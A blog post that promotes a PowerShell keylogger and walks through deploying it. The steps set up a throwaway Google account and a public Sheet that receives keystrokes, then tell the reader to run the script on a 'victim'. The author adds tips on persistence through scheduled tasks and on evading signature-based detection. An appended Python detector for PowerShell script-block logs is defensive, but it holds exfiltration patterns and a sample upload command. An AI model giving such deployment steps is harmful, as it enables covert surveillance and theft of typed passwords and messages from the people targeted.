PowerShell Keylogger

Aaron made a cool PowerShell-based keylogger (well, it was Python until I bribed him to rewrite it for me…)

It is located on his GitHub page

It's great because it handles the keylogging and the exfiltration of data!

In order to use it you:

  1. Create a fake Google Account (or use a throw-away)
  2. Create a Spreadsheet in that account’s Google Drive
  3. Make the Sheet public
     1. File > Share... > Give it a random name > Get sharable link
  4. Visit Google Scripts and paste in the code from server.gs
  5. Add the Sheet’s URL from step 3.1 to the SPREADSHEET_URL variable in server.gs
     1. Remove the ?usp=sharing at the end. The URL should end in /edit
  6. Publish the server:
  7. Save and name the project
  8. Publish > Deploy as web app
    • Make sure “Anyone, even anonymous” can access the app
  9. Review permissions > (your fake account here) > Advanced > Go to Untitled Project (unsafe) > enter ‘Continue’ > allow
  10. Copy the URL and paste it in the SERVER_URL of the logger you are using
  11. Copy the PowerShell code to your victim
  12. Run the PowerShell script!
    • The script runs for 1 to 3 minutes before publishing the keystrokes to the Google Sheet
  13. Lastly, I went into the Google Sheet and published it to the web for easier viewing

Sometimes, if I typed too fast, it doesn't record all of the typed keys, and it doesn't record backspaces or punctuation.

As-is, it only runs once, and if you want it to run continuously, it needs some edits or perhaps a scheduled task to get it going again. When I used it, I edited it to not use Google Scripts and instead, I had it save a file locally. Not very sneaky… I also set it to run for 10 minutes and send me its log via scheduled task and then restart the script. Because there aren’t signatures developed for it, it might not flag host-based security systems.
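
With no signatures available, detection has to key on behaviour recorded in PowerShell script block logs (Event ID 4104). The following is an added example, not code from this post or from Aaron's repository: it reassembles fragmented 4104 records and flags blocks that combine keystroke-capture API names with web requests, an Apps Script web-app URL, or scheduled-task creation. Assumptions: the API names in the indicator list, the record layout (the `Host` key in particular) and the sample records are constructed for illustration.

```python
import re
from collections import defaultdict

# Indicator families. The key-capture API names are assumptions about how a
# PowerShell keylogger reads keys; the post does not say which calls it uses.
INDICATORS = {
    "key_capture": re.compile(r"GetAsyncKeyState|GetKeyboardState|SetWindowsHookEx", re.I),
    "web_request": re.compile(r"Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient", re.I),
    "apps_script": re.compile(r"script\.google\.com/macros/s/", re.I),
    "sched_task": re.compile(r"Register-ScheduledTask|schtasks(\.exe)?\s+/create", re.I),
}

def reassemble(events):
    """Join 4104 fragments: long scripts are logged as several events that
    share a ScriptBlockId and are ordered by MessageNumber."""
    parts = defaultdict(list)
    for e in events:
        if e["EventID"] == 4104:
            key = (e["Host"], e["ScriptBlockId"])
            parts[key].append((e["MessageNumber"], e["ScriptBlockText"]))
    return {k: "".join(text for _, text in sorted(v)) for k, v in parts.items()}

def triage(events):
    """Return {(host, block_id): indicator names} for script blocks that show
    key capture together with at least one other indicator family."""
    findings = {}
    for key, text in reassemble(events).items():
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
        if "key_capture" in hits and len(hits) > 1:
            findings[key] = hits
    return findings

# Constructed sample records (not real logs); the URL path is a placeholder.
SAMPLE = [
    {"EventID": 4104, "Host": "ws01", "ScriptBlockId": "a1", "MessageNumber": 2,
     "ScriptBlockText": "Invoke-WebRequest -Uri $SERVER_URL -Method Post -Body $log"},
    {"EventID": 4104, "Host": "ws01", "ScriptBlockId": "a1", "MessageNumber": 1,
     "ScriptBlockText": "$SERVER_URL='https://script.google.com/macros/s/PLACEHOLDER/exec'\n"
                        "Add-Type -MemberDefinition $sig  # imports GetAsyncKeyState\n"},
    {"EventID": 4104, "Host": "ws02", "ScriptBlockId": "b7", "MessageNumber": 1,
     "ScriptBlockText": "Invoke-RestMethod https://example.com/api/health"},
    {"EventID": 4103, "Host": "ws02", "ScriptBlockId": "b7", "MessageNumber": 1,
     "ScriptBlockText": "GetAsyncKeyState Register-ScheduledTask"},
]

if __name__ == "__main__":
    for (host, block), hits in triage(SAMPLE).items():
        print(host, block, hits)
```

Script block logging must be enabled for 4104 events to exist, and the indicators only match what appears in the logged script text.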

Neat little tool! Thanks Aaron!